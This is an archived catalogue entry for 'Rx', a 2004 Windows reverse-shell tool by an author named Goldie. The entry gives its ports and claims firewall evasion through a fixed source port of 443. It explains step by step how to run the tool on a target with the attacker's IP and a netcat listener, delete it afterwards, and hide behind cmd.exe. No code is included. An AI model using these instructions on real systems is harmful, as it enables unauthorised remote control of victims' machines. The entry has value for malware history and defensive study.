Rx

Released 20 years, 4 months ago. May 2004

Copyright © MegaSecurity

By Goldie


Informations
Author Goldie
Family Rx
Category Remote Access
Version Rx
Released Date May 2004, 20 years, 4 months ago.

Author Information / Description
Rx - The Smallest VC++ Coded Universal Windows Reverse Shell

Description
---=====---

The Smallest VC++ Coded Universal Windows Reverse Shell for all versions of Windows NT/2K/XP/2003 with any service pack.
But not for Windows 98/ME! since Microsoft stopped the support for them, i can't code for an unsupport Operating system. :))
A Tini, Small, Petite app that connects back to the specified IP to a fixedport and uses a fixed port on the 
source machine to evade the firewalls.

Default port from which it connects  : 443
Default port to which it connects is : 8080

Working
--===--

Just run it with the IP address of your machine after starting a netcat listener on your machine at port 8080.
Execute it on the target machine with your IP Address as the parameter.

Example: Rx "192.168.0.1"

It connects from the attacked machine to attacker's machine (i.e., your machine) on Port 8080. 
Currently the ports used are hardcoded in the program to keep the size to the minumum. 
But if you want you can change it at the exe.


Usage
--=--

Use netcat listener on your machine's port 8080 & execute the Rx on the target machine. 
It will connect to your machine with a Cmd Shell. Then what else?. Enjoy your stay!. 
You can delete the Rx after you have been dropped on to the shell. The process will exit automatically.
The only connection between you & the target machine will through the cmd.exe.

Rest you can figure it out. :)

Also the way of executing Rx.exe on the target machine.

Netstat details
---=========---

Z:\Proggies\Rx>netstat -an | find /i "esta" | find /i "8080"
TCP	192.168.0.1:443	192.168.0.2:8080	ESTABLISHED

Process Statistics
---============---
Rx will not be found in the target machine's processes list. 
Instead, it'll be cmd.exe that handle's the connection.

Goldie

If you recognize any personal information on this page and wish to have it removed or redacted, please contact us at jplesueur@phrozen.io. We are committed to protecting your privacy in accordance with GDPR regulations.